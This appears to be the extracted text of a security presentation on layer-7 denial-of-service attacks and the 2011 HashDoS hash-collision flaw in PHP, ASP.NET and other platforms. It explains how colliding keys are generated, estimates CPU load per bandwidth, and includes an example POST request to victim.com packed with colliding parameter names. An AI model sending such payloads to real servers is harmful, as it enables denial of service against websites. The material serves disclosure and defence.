Layer-7 DoS

Hash Collisions

Provide cyber fraud protection to websites

Prevent business logic attacks on web applications

Heuristic web user behavior analysis

Signature-free 0-day attack detection

About Hybrid Security

Layer-7 DoS

• Slowloris: Written by RSnake, exploits slow HTTP headers

• R.U.Dead.Yet: Written by Raviv Raz, exploits slow POST fields

• Keep-Dead: Written by Esrun,exploits long Keep-Alive sessions

Hash DoS

• HashDoS – Advisory published by Julian Wäld & Alexander Klink, Dec. 28, 2011

• Vulnerability in ASP.NET (MS11-100)

• Vulnerability in PHP 4 and 5

• Also vulnerable:Java, Tomcat, Python, Ruby, Oracle

Hash TablesHash Key

login=root passwd=123

Insert, search, delete node

with O(n) complexity

Hash CollisionsHash Key

EzEz=123

EzFY=123

FYEz=123

When h(Ez) = h(FY)…

Insert, search, delete node

become O(n²) complexity

DJBX33A Hashing• Daniel J. Bernsetin, 33 additions• Used in 32 bit PHP 5, Java Tomcat• Similar function used in Ruby

Hashing With the Pigeons

Strings

Hashes

• Apparently, a non-injective function

• More commonly known as the pigeonhole principle

DJBX33X Hashing

• Daniel J. Bernsetin, 33 XORs• Used in 32/64 bit PHP 4 & ASP.NET• Similar function used in Python

Linear Collision Generation

h('Ey') = 31¹ · 69 + 31° · 121 = 2260

h('FZ') = 31¹ · 70 + 31° · 90 = 2260

h('Eya') = 31 · (31¹ · 69 + 31° · 121) + 31°·97

= 31 · (31¹ · 70 + 31° · 90) + 31°·97

= h('FZa')

DEMODEMO

Using Binary Permutations

h('EzEz') (00)

= h('EzFY') (01)

= h('FYEz') (10)

= h('FYFY') (11)

Pre-computing rainbow tables

• Calculate long permutations of colliding char pairs• Create many same-hash field names for POST• More advanced Meet-In-The-Middle techniques

improve rainbow table creation exponentially

PHP 5

• DJBX33X• 1 Gbit speed keeps

~ 10,000 i7 core CPU busy• POST limited by 8 MB• POST limited by max_input_time

(default on Ubuntu/BSD = 60 seconds)

<?

php echo $_POST["param"];

?>

• DJBX33X• Breakable using

Meet-In-The-Middle• 30 kbits/sec keeps

1 core-2 CPU busy• With 1 Gbit keeps

~ 30,000 core-2 CPU busy

<%

Response.Write Request.Form['param'];

%>

POST http://victim.com/

Host: victim.com

Connection: keep-alive

Content-Length: 1000000

User-Agent: Mozilla/5.0

Cookie: __utmz=181569312.1294666144.1.1

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&

EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…

PoC already in the wildPoC already in the wild

Thank YouThank You

raviv@hybridsec.comhttp://www.hybridsec.com